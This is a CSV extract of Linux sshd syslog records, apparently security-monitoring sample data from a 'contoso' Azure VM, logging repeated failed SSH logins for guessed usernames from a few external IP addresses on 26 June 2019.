+4712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:42,UbuntuDevEnv,2019-06-26 14:50:41,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 37726:11: Bye Bye [preauth],13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,37726,,
+4713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:42,UbuntuDevEnv,2019-06-26 14:50:41,auth,UbuntuDevEnv,info,Disconnected from invalid user temp 47.254.147.170 port 37726 [preauth],13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,47.254.147.1,37726,,
+4714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:35,UbuntuDevEnv,2019-06-26 14:51:34,auth,UbuntuDevEnv,info,Invalid user maya from 164.132.192.219 port 53366,14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,164.132.192.2,53366,,
+4715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:35,UbuntuDevEnv,2019-06-26 14:51:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:35,UbuntuDevEnv,2019-06-26 14:51:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:36,UbuntuDevEnv,2019-06-26 14:51:36,auth,UbuntuDevEnv,info,Failed password for invalid user maya from 164.132.192.219 port 53366 ssh2,14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,164.132.192.2,53366,,
+4718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:36,UbuntuDevEnv,2019-06-26 14:51:36,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 53366:11: Bye Bye [preauth],14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,53366,,
+4719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:36,UbuntuDevEnv,2019-06-26 14:51:36,auth,UbuntuDevEnv,info,Disconnected from invalid user maya 164.132.192.219 port 53366 [preauth],14031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maya,164.132.192.2,53366,,
+4720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:51,UbuntuDevEnv,2019-06-26 14:51:51,auth,UbuntuDevEnv,info,Invalid user django from 220.134.138.111 port 55594,14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,220.134.138.1,55594,,
+4721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:51,UbuntuDevEnv,2019-06-26 14:51:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:51,UbuntuDevEnv,2019-06-26 14:51:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:54,UbuntuDevEnv,2019-06-26 14:51:53,auth,UbuntuDevEnv,info,Failed password for invalid user django from 220.134.138.111 port 55594 ssh2,14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,220.134.138.1,55594,,
+4724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:54,UbuntuDevEnv,2019-06-26 14:51:54,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 55594:11: Bye Bye [preauth],14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,55594,,
+4725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:51:54,UbuntuDevEnv,2019-06-26 14:51:54,auth,UbuntuDevEnv,info,Disconnected from invalid user django 220.134.138.111 port 55594 [preauth],14091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,220.134.138.1,55594,,
+4726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:05,UbuntuDevEnv,2019-06-26 14:52:05,auth,UbuntuDevEnv,info,Invalid user tushar from 47.254.147.170 port 55162,14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tushar,47.254.147.1,55162,,
+4727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:05,UbuntuDevEnv,2019-06-26 14:52:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:05,UbuntuDevEnv,2019-06-26 14:52:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:07,UbuntuDevEnv,2019-06-26 14:52:06,auth,UbuntuDevEnv,info,Failed password for invalid user tushar from 47.254.147.170 port 55162 ssh2,14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tushar,47.254.147.1,55162,,
+4730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:07,UbuntuDevEnv,2019-06-26 14:52:06,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 55162:11: Bye Bye [preauth],14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,55162,,
+4731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:52:07,UbuntuDevEnv,2019-06-26 14:52:06,auth,UbuntuDevEnv,info,Disconnected from invalid user tushar 47.254.147.170 port 55162 [preauth],14225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tushar,47.254.147.1,55162,,
+4732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:08,UbuntuDevEnv,2019-06-26 14:53:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219  user=test,14440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,164.132.192.2,,0,
+4733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:10,UbuntuDevEnv,2019-06-26 14:53:10,auth,UbuntuDevEnv,info,Failed password for test from 164.132.192.219 port 33694 ssh2,14440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,33694,,
+4734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:10,UbuntuDevEnv,2019-06-26 14:53:10,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 33694:11: Bye Bye [preauth],14440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,33694,,
+4735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:10,UbuntuDevEnv,2019-06-26 14:53:10,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 164.132.192.219 port 33694 [preauth],14440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,164.132.192.2,33694,,
+4736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:36,UbuntuDevEnv,2019-06-26 14:53:35,auth,UbuntuDevEnv,info,Invalid user system from 47.254.147.170 port 44356,14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,47.254.147.1,44356,,
+4737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:36,UbuntuDevEnv,2019-06-26 14:53:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:36,UbuntuDevEnv,2019-06-26 14:53:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:38,UbuntuDevEnv,2019-06-26 14:53:37,auth,UbuntuDevEnv,info,Failed password for invalid user system from 47.254.147.170 port 44356 ssh2,14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,47.254.147.1,44356,,
+4740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:38,UbuntuDevEnv,2019-06-26 14:53:37,auth,UbuntuDevEnv,info,Disconnected from invalid user system 47.254.147.170 port 44356 [preauth],14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,47.254.147.1,44356,,
+4741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:38,UbuntuDevEnv,2019-06-26 14:53:37,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 44356:11: Bye Bye [preauth],14541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,44356,,
+4742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:39,UbuntuDevEnv,2019-06-26 14:53:39,auth,UbuntuDevEnv,info,Invalid user lou from 220.134.138.111 port 44458,14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,220.134.138.1,44458,,
+4743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:39,UbuntuDevEnv,2019-06-26 14:53:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:39,UbuntuDevEnv,2019-06-26 14:53:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:41,UbuntuDevEnv,2019-06-26 14:53:41,auth,UbuntuDevEnv,info,Failed password for invalid user lou from 220.134.138.111 port 44458 ssh2,14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,220.134.138.1,44458,,
+4746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:42,UbuntuDevEnv,2019-06-26 14:53:41,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 44458:11: Bye Bye [preauth],14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,44458,,
+4747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:53:42,UbuntuDevEnv,2019-06-26 14:53:41,auth,UbuntuDevEnv,info,Disconnected from invalid user lou 220.134.138.111 port 44458 [preauth],14548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,220.134.138.1,44458,,
+4748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:40,UbuntuDevEnv,2019-06-26 14:54:39,auth,UbuntuDevEnv,info,Invalid user monitoring from 164.132.192.219 port 42255,14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitoring,164.132.192.2,42255,,
+4749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:40,UbuntuDevEnv,2019-06-26 14:54:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:40,UbuntuDevEnv,2019-06-26 14:54:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:43,UbuntuDevEnv,2019-06-26 14:54:42,auth,UbuntuDevEnv,info,Failed password for invalid user monitoring from 164.132.192.219 port 42255 ssh2,14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitoring,164.132.192.2,42255,,
+4752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:43,UbuntuDevEnv,2019-06-26 14:54:42,auth,UbuntuDevEnv,info,Disconnected from invalid user monitoring 164.132.192.219 port 42255 [preauth],14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitoring,164.132.192.2,42255,,
+4753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:54:43,UbuntuDevEnv,2019-06-26 14:54:42,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 42255:11: Bye Bye [preauth],14770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,42255,,
+4754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:07,UbuntuDevEnv,2019-06-26 14:55:07,auth,UbuntuDevEnv,info,Invalid user edouard from 47.254.147.170 port 33506,14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edouard,47.254.147.1,33506,,
+4755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:07,UbuntuDevEnv,2019-06-26 14:55:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:07,UbuntuDevEnv,2019-06-26 14:55:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:09,UbuntuDevEnv,2019-06-26 14:55:09,auth,UbuntuDevEnv,info,Failed password for invalid user edouard from 47.254.147.170 port 33506 ssh2,14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edouard,47.254.147.1,33506,,
+4758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:09,UbuntuDevEnv,2019-06-26 14:55:09,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 33506:11: Bye Bye [preauth],14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,33506,,
+4759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:09,UbuntuDevEnv,2019-06-26 14:55:09,auth,UbuntuDevEnv,info,Disconnected from invalid user edouard 47.254.147.170 port 33506 [preauth],14872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edouard,47.254.147.1,33506,,
+4760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:29,UbuntuDevEnv,2019-06-26 14:55:28,auth,UbuntuDevEnv,info,Invalid user tigrou from 220.134.138.111 port 33324,14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,220.134.138.1,33324,,
+4761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:29,UbuntuDevEnv,2019-06-26 14:55:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:29,UbuntuDevEnv,2019-06-26 14:55:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:31,UbuntuDevEnv,2019-06-26 14:55:31,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 220.134.138.111 port 33324 ssh2,14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,220.134.138.1,33324,,
+4764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:32,UbuntuDevEnv,2019-06-26 14:55:31,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 220.134.138.111 port 33324 [preauth],14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,220.134.138.1,33324,,
+4765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:55:32,UbuntuDevEnv,2019-06-26 14:55:31,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 33324:11: Bye Bye [preauth],14945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,33324,,
+4766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:09,UbuntuDevEnv,2019-06-26 14:56:09,auth,UbuntuDevEnv,info,Invalid user texdir from 164.132.192.219 port 50815,15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,texdir,164.132.192.2,50815,,
+4767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:09,UbuntuDevEnv,2019-06-26 14:56:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:09,UbuntuDevEnv,2019-06-26 14:56:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:11,UbuntuDevEnv,2019-06-26 14:56:10,auth,UbuntuDevEnv,info,Failed password for invalid user texdir from 164.132.192.219 port 50815 ssh2,15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,texdir,164.132.192.2,50815,,
+4770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:11,UbuntuDevEnv,2019-06-26 14:56:11,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 50815:11: Bye Bye [preauth],15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,50815,,
+4771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:56:11,UbuntuDevEnv,2019-06-26 14:56:11,auth,UbuntuDevEnv,info,Disconnected from invalid user texdir 164.132.192.219 port 50815 [preauth],15088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,texdir,164.132.192.2,50815,,
